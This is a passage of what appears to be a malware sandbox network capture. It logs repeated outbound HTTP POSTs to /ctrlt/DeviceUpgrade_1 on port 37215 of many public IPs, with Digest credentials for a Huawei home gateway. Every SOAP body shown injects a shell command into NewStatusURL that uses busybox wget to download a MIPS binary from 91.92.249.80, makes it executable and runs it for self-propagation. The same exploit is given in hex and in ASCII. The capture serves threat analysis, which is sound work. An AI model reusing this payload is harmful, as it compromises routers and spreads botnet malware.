                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          121192.168.2.2358474134.159.69.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.126804113 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          122192.168.2.235264072.132.102.2437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.126804113 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          123192.168.2.2340048145.100.163.637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.126804113 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          124192.168.2.2360088197.248.110.15837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.126806974 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          125192.168.2.2360136134.239.241.1837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.126806974 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          126192.168.2.234134641.41.240.1837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.126822948 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          127192.168.2.2359926197.65.37.20937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.126831055 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          128192.168.2.234315499.246.133.1937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.129879951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          129192.168.2.2336894157.140.211.20837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.129949093 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          130192.168.2.2344410173.241.30.19237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.130657911 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          131192.168.2.234211241.37.212.24937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.130665064 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
